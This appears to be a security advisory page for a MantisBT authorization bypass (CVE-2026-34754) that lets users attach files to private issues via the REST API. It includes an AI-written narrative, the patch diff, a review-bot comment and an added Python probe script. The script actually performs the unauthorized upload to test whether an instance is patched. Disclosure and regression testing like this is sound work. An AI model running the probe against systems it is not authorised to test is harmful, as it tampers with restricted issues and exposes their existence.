MantisBT has an Authorization Bypass that Allows Uploading Attachments to Private Issues via REST API
Description
Impact
MantisBT allows an authenticated user to upload attachments to private Issues they are not authorized to access.
Patches
- b262b4d2835b81394d75356dead66e52a6275206
Workarounds
None.
Credits
Thanks to Vishal Shukla for discovering and responsibly reporting the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
MantisBT allows authenticated users to upload attachments to private issues they cannot view, due to a missing issue-level authorization check in the REST API.
Vulnerability
Description
CVE-2026-34754 is an authorization bypass vulnerability in MantisBT, an open-source bug tracker. The flaw resides in the REST API endpoint POST /api/rest/issues/{id}/files, which handles file uploads to existing issues. The permission check function file_allow_bug_upload() in core/file_api.php only verifies that the user meets the project-level upload_bug_file_threshold configuration, without checking whether the user meets the view_bug_threshold for the specific issue [2]. As a result, any authenticated user who may upload files to a project can attach files to any issue in that project, including private or restricted issues they are not authorized to view [1][2].
Exploitation
To exploit this vulnerability, an attacker must have a valid MantisBT account with file upload privileges for a given project (i.e., their access level meets the upload_bug_file_threshold). No other special privileges are required. The attacker can then send a POST request to the REST endpoint with the ID of a private issue they should not be able to access, and the server will accept the attachment [2]. The attack is performed over the network and does not require any user interaction [3].
Impact
Successful exploitation allows an attacker to attach arbitrary files to private issues they cannot view. This is an integrity problem, since the attacker adds content to issues they should not be able to modify, and it also has a confidentiality aspect: an accepted upload confirms that a given private issue ID exists, and the attacker's file is subsequently served to the issue's legitimate viewers, who may treat an attachment on a restricted issue as trustworthy [3].
Mitigation
The MantisBT project has released a patch in commit b262b4d2835b81394d75356dead66e52a6275206 [4]. The fix modifies file_allow_bug_upload() to enforce issue-level access control for existing issues: when a bug ID is provided it now calls access_has_bug_level() instead of access_has_project_level(), so a user who cannot view the issue cannot attach files to it [2][4]. Users should upgrade to MantisBT 2.28.2 or later, which contains this commit. No workarounds are available [1].
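The following Python script is an added example, not code from MantisBT or from the advisory. It turns the attack described under Exploitation into a regression check for the fix described under Mitigation: with a token for an account that has upload rights on the project but cannot view a chosen private issue, it issues the GET for the issue (expected to be refused) and then the POST to /api/rest/issues/{id}/files, and reports whether the upload was accepted (pre-2.28.2 behaviour) or refused (patched). The base URL, token and issue ID are placeholders, the raw-token Authorization header and the {"files": [{"name", "content"}]} request body are assumptions taken from the MantisBT REST API documentation as understood here, and the script is only meant for an instance you are authorised to test.

```python
import base64
import json
import sys
import urllib.error
import urllib.request

# Constructed placeholders (assumptions): point these at a test instance you own.
BASE_URL = "https://mantis.example.org"      # MantisBT root; REST API lives under /api/rest
API_TOKEN = "REPLACE_WITH_API_TOKEN"          # token of a user with upload rights on the project
PRIVATE_ISSUE_ID = 1234                       # an issue that this user must NOT be able to view


def _headers(token):
    # Assumption: MantisBT's REST API takes the raw API token in Authorization (no "Bearer").
    return {"Authorization": token, "Content-Type": "application/json"}


def build_view_request(base_url, token, issue_id):
    """GET /api/rest/issues/{id}: establishes whether the account can see the issue at all."""
    url = f"{base_url.rstrip('/')}/api/rest/issues/{int(issue_id)}"
    return urllib.request.Request(url, headers=_headers(token), method="GET")


def build_upload_request(base_url, token, issue_id, filename, data):
    """POST /api/rest/issues/{id}/files with a harmless text attachment.

    Assumption: the body shape {"files": [{"name": ..., "content": <base64>}]}
    follows the MantisBT REST API documentation.
    """
    url = f"{base_url.rstrip('/')}/api/rest/issues/{int(issue_id)}/files"
    body = {"files": [{"name": filename,
                       "content": base64.b64encode(data).decode("ascii")}]}
    return urllib.request.Request(url, data=json.dumps(body).encode("utf-8"),
                                  headers=_headers(token), method="POST")


def send(req):
    """Return the HTTP status code; 4xx/5xx are results here, not exceptions."""
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def classify(view_status, upload_status):
    """Interpret the two status codes.

    The probe is only meaningful when the account is refused on the GET (403):
    a 200 means the chosen issue is visible to the account, and a 404 means the
    ID does not exist, so neither says anything about the upload check.
    """
    if view_status != 403:
        return "inconclusive"
    if upload_status == 403:
        return "patched"        # issue-level check is now applied to uploads (2.28.2)
    if upload_status in (200, 201):
        return "vulnerable"     # project-level check only: file landed on a hidden issue
    return "inconclusive"       # e.g. 5xx or a validation error unrelated to access


def check_instance(base_url, token, issue_id):
    view = send(build_view_request(base_url, token, issue_id))
    upload = send(build_upload_request(base_url, token, issue_id,
                                       "cve-2026-34754-probe.txt",
                                       b"authorised regression probe\n"))
    return classify(view, upload), view, upload


if __name__ == "__main__":
    verdict, v, u = check_instance(BASE_URL, API_TOKEN, PRIVATE_ISSUE_ID)
    print(f"GET issue -> {v}, POST files -> {u}: {verdict}")
    sys.exit(0 if verdict == "patched" else 1)
```

Run it once before and once after the upgrade; a "vulnerable" verdict means the probe file was actually attached to the private issue, so delete it afterwards with an account that can see the issue.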
References
[1] GitHub - mantisbt/mantisbt: Mantis Bug Tracker (MantisBT)
[2] 0036976: CVE-2026-34754: Authorization Bypass Allows Uploading Attachments to Private Issues via REST
[3] Authorization Bypass Allows Uploading Attachments to Private Issues via REST API
[4] Prevent unauthorized attachment upload via REST · mantisbt/mantisbt@b262b4d
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| mantisbt/mantisbt (Packagist) | < 2.28.2 | 2.28.2 |
Affected products: 2
Patches: 1
b262b4d2835b: Prevent unauthorized attachment upload via REST
1 file changed · +7 −1
core/file_api.php+7 −1 modified@@ -1178,7 +1178,13 @@ function file_allow_bug_upload( $p_bug_id = null, $p_user_id = null, $p_project_ } # Check the access level against the config setting - return access_has_project_level( config_get( 'upload_bug_file_threshold' ), $t_project_id, $p_user_id ); + $t_upload_bug_file_threshold = config_get( 'upload_bug_file_threshold' ); + if( null !== $p_bug_id ) { + # Existing issue: if user can't view it, then they can't add attachments + return access_has_bug_level( $t_upload_bug_file_threshold, $p_bug_id, $p_user_id ); + } + # New issue - check against project + return access_has_project_level( $t_upload_bug_file_threshold, $t_project_id, $p_user_id ); } /**
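Review bot: the new issue-level branch only takes effect when the caller passes a non-null $p_bug_id; any caller that still invokes file_allow_bug_upload() with $p_bug_id = null for an existing issue falls through to the unchanged `return access_has_project_level( $t_upload_bug_file_threshold, $t_project_id, $p_user_id );` and keeps the pre-fix behaviour. Please confirm that the REST files handler and the other upload paths (web UI, SOAP) pass the issue id, and add a regression test that POSTs an attachment to an issue the test user cannot view and expects access to be denied. The comment "Existing issue: if user can't view it, then they can't add attachments" also relies on access_has_bug_level() itself refusing issues the user cannot view, which is not visible in this hunk; a docblock note on the function stating that dependency would make the intent verifiable from the code.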